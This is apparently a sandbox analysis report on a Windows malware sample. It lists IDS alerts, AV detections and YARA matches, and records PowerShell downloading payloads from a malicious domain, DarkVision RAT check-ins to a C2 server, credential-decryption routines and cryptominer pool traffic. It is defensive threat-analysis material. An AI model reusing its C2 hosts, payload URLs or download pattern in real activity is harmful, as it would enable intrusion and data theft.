| 2024-12-09T07:38:29.876691+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49764 | 154.216.20.243 | 443 | TCP |
| 2024-12-09T07:37:31.145554+0100 | 2022482 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 154.216.20.243 | 443 | TCP |
| 2024-12-09T07:37:31.426940+0100 | 2021954 | 1 | A Network Trojan was detected | 154.216.20.243 | 443 | 192.168.2.4 | 49737 | TCP |
| 2024-12-09T07:37:29.989191+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:35.410820+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:38.092973+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:40.827923+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:43.495962+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:46.191236+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:41.565655+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49848 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:46.992724+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49863 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:49.693183+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49870 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:52.366437+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49876 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:55.065857+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49883 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:57.772811+0100 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.4 | 49892 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:37:33.710760+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 185.157.162.216 | 5200 | TCP |
| 2024-12-09T07:38:45.306325+0100 | 2045619 | 1 | A Network Trojan was detected | 192.168.2.4 | 49848 | 185.157.162.216 | 5200 | TCP |

AV Detection
                    Source: https://woo097878781.win/WindosCPUsystem.exe | Avira URL Cloud: Label: malware
                    Source: https://woo097878781.win/upload.php | Avira URL Cloud: Label: malware
                    Source: https://woo097878781.win:443/upload.php | Avira URL Cloud: Label: malware
                    Source: 16.2.explorer.exe.e00000.0.unpack | Malware Configuration Extractor: DarkVision Rat {"C2": "185.157.162.216", "Port": 5200}
                    Source: woo097878781.win | Virustotal: Detection: 11%
                    Source: https://woo097878781.win/downloaded_file.bin | Virustotal: Detection: 6%
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | ReversingLabs: Detection: 83%
                    Source: file.exe | ReversingLabs: Detection: 34%
                    Source: file.exe | Virustotal: Detection: 44%
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Joe Sandbox ML: detected
                    Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe | Joe Sandbox ML: detected
                    Source: file.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031C031 CryptReleaseContext,CryptDestroyHash,13_2_0031C031
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031C00C CryptReleaseContext,CryptDestroyHash,13_2_0031C00C
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00305140 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,__snwprintf,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,13_2_00305140
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031BF00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,13_2_0031BF00
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031BFB6 CryptReleaseContext,CryptDestroyHash,13_2_0031BFB6
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031BFD9 CryptReleaseContext,CryptDestroyHash,13_2_0031BFD9
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E1DAD0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,16_2_00E1DAD0
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E053B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,16_2_00E053B0
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E1DBEE CryptReleaseContext,CryptDestroyHash,16_2_00E1DBEE
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E1DBC7 CryptReleaseContext,CryptDestroyHash,16_2_00E1DBC7
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E1DC5F CryptReleaseContext,CryptDestroyHash,16_2_00E1DC5F
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E1DC2A CryptReleaseContext,CryptDestroyHash,16_2_00E1DC2A
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C52D0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C6640
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022CA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022CA4A0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9AC0 CryptBinaryToStringW,RegGetValueW,18_2_022C9AC0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,18_2_022C9BF0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C49D0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,18_2_022C6E70
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C4FD0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,18_2_022C4CD0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,18_2_022C9D30
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022CA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,18_2_022CA7A0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C55D0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9E27 CryptReleaseContext,CryptDestroyHash,18_2_022C9E27
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,18_2_022C5E10
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C3E70 CryptStringToBinaryA,18_2_022C3E70
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9E4E CryptReleaseContext,CryptDestroyHash,18_2_022C9E4E
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9EBF CryptReleaseContext,CryptDestroyHash,18_2_022C9EBF
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C9E8A CryptReleaseContext,CryptDestroyHash,18_2_022C9E8A

                    Exploits

                    Source: Yara match | File source: 13.2.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.downloaded_file.exe.fedfd8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.explorer.exe.e00000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75e6b438.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.0.downloaded_file.exe.300000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.powershell.exe.29e75ee9280.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 13.2.downloaded_file.exe.fedfd8.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000003.1947121395.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000000.1946141643.0000000000332000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.1957167452.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.1939596081.0000029E75DED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: downloaded_file.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7784, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED

                    Bitcoin Miner

                    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 1436, type: MEMORYSTR
                    Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_0031CA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,13_2_0031CA90
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00313620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,13_2_00313620
                    Source: C:\Windows\explorer.exe | Code function: 16_2_00E097F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,16_2_00E097F0
                    Source: C:\Windows\explorer.exe | Code function: 18_2_022C7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,18_2_022C7FB0
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp\295D.tmp
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\295B.tmp\295C.tmp

                    Networking

                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49741 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49745 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49747 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49746 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49744 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49848 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49863 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49848 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49870 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49876 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49883 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49892 -> 185.157.162.216:5200
                    Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.4:49737 -> 154.216.20.243:443
                    Source: Network traffic | Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.4:49737
                    Source: C:\Windows\explorer.exe | Network Connect: 5.188.137.200 3333
                    Source: C:\Windows\explorer.exe | Network Connect: 154.216.20.243 443
                    Source: C:\Windows\explorer.exe | Network Connect: 37.203.243.102 3333
                    Source: C:\Windows\explorer.exe | Network Connect: 185.157.162.216 5200
                    Source: Malware configuration extractor | IPs: 185.157.162.216
                    Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 185.157.162.216:5200
                    Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 37.203.243.102:3333
                    Source: global traffic | TCP traffic: 192.168.2.4:49816 -> 5.188.137.200:3333
                    Source: Joe Sandbox View | IP Address: 154.216.20.243
                    Source: Joe Sandbox View | ASN Name: SELECTEL-MSKRU
                    Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 154.216.20.243:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 154.216.20.243:443
                    Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:54892 -> 1.1.1.1:53
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 154.216.20.243:443
                    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49764 -> 154.216.20.243:443
                    Source: global traffic | HTTP traffic detected: GET /downloaded_file.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: woo097878781.win | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: woo097878781.win
                    Source: global traffic | HTTP traffic detected: GET /64.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: woo097878781.win
                    Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216 (this identical entry is listed 50 times in the report)
                    Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe | Code function: 13_2_00321580 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,setsockopt,setsockopt,WSACreateEvent,WSAEventSelect,CloseHandle,shutdown,closesocket,WaitForMultipleObjects,WaitForSingleObject,WaitForSingleObject,WSAEnumNetworkEvents,shutdown,closesocket,CloseHandle,recv,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,WaitForSingleObject,shutdown,closesocket,CloseHandle,shutdown,closesocket,shutdown,closesocket,CloseHandle,shutdown,closesocket,LocalFree,13_2_00321580
                    Source: global traffic | HTTP traffic detected: GET /downloaded_file.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: woo097878781.win | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: woo097878781.win
                    Source: global traffic | HTTP traffic detected: GET /64.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: woo097878781.win
                    Source: global traffic | DNS traffic detected: DNS query: woo097878781.win
                    Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                    Source: WindosCPUsystem.exe, 00000013.00000003.2043817776.0000016DE6150000.00000004.00000001.00020000.00000000.sdmp, WindosCPUsystem.exe, 0000001F.00000003.2062364463.000001677A4C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
                    Source: powershell.exe, 00000007.00000002.1807555858.00000238530B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                    Source: powershell.exe, 00000007.00000002.1823090000.0000023864C62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1823090000.0000023864DA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.i.lencr.org/0
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://r11.o.lencr.org0#
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65E06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856262000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://woo097878781.win
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856378000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: powershell.exe, 00000007.00000002.1807712895.00000238564EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                    Source: explorer.exe, 00000012.00000003.2618390437.0000000002841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618077052.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618182430.0000000000915000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2643180030.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2618256867.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2644899581.0000000000915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                    Source: powershell.exe, 0000000C.00000002.1932629434.0000029E65DB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023854BF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1932629434.0000029E65DDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000007.00000002.1807712895.0000023856574000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
